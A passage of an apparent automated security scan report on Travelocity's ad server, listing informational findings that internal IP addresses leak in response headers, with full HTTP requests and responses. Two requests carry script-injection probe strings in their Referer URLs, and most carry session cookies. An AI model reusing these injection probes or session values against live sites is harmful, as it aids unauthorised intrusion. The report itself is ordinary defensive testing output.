P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:13 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 884
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=83479&AdID=152818&TargetID=8870&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,2230
...[SNIP]...

23.16. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 896
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125327&AdID=178801&TargetID=31769&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5714,5796,9520,10495,11148,12670,20052,20299,20311,22041,22251,22
...[SNIP]...

23.17. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:48 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1399
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...

23.18. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,,
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1277
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...

23.19. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1056
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125326&AdID=181467&TargetID=31993&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,9520,10495,11148,12670,20052,20299,20311,21304,22041,22251,2
...[SNIP]...

23.20. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:52 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:52:52 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 355
Content-Type: application/x-javascript

document.write('<!-- PubMatic ad tag (Javascript) : igougo_300X250_ATF | http://www.igougo.com | 300 x 250 Medium Rectangle -->\n');
var pubId=26620;
var siteId=26621;
var kadId=21556;
var kadwidth=30
...[SNIP]...

23.21. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:52 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:52:52 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 347
Content-Type: application/x-javascript

document.write('<!-- PubMatic ad tag (Javascript) : igougo_728X90_ATF | http://www.igougo.com | 728 x 90 Leaderboard -->\n');
var pubId=26620;
var siteId=26621;
var kadId=21557;
var kadwidth=728;
var
...[SNIP]...

23.22. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:52 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:52:52 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 19
Content-Type: application/x-javascript

document.write('');

23.23. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:26:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 729
Content-Type: application/x-javascript

document.write('<a target=\"_new\" href=\"http://dm.travelocity.com:80/event.ng/Type=click&FlightID=101283&AdID=151343&TargetID=17576&Segments=1,4301,4302,4304,4865,4921,5016,9095,11559,16220,20349,21
...[SNIP]...

23.24. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:50:30 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:50:30 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 729
Content-Type: application/x-javascript

document.write('<a target=\"_new\" href=\"http://dm.travelocity.com:80/event.ng/Type=click&FlightID=101283&AdID=151343&TargetID=17576&Segments=1,4301,4302,4304,4865,4921,5016,9095,11559,16220,20349,21
...[SNIP]...

23.25. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:47:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:47:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 729
Content-Type: application/x-javascript

document.write('<a target=\"_new\" href=\"http://dm.travelocity.com:80/event.ng/Type=click&FlightID=101283&AdID=151343&TargetID=17576&Segments=1,4301,4302,4304,4865,4921,5016,9095,11559,16220,20349,21
...[SNIP]...

23.26. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600 HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Apache
X-Server: prdlmn0408
Set-Cookie: NGUserID=a1c4b0d-32323-499133968-1317600484; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:04 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1150
Content-Type: application/x-javascript

document.write('<a href=\"http://dm.travelocity.com/event.ng/Type=click&FlightID=131412&AdID=180775&TargetID=28645&ASeg=&AMod=&AOpt=0&Segments=1,9,24,3090,4384,5796,5848,9520,10495,11148,12670,20052,2
...[SNIP]...

23.27. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600 HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:06 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:06 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1204
Content-Type: application/x-javascript

document.write('<a href=\"http://dm.travelocity.com/event.ng/Type=click&FlightID=131412&AdID=180775&TargetID=28645&ASeg=&AMod=&AOpt=0&Segments=1,9,24,3090,4384,5796,5848,9520,10495,11148,12670,20052,2
...[SNIP]...

23.28. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
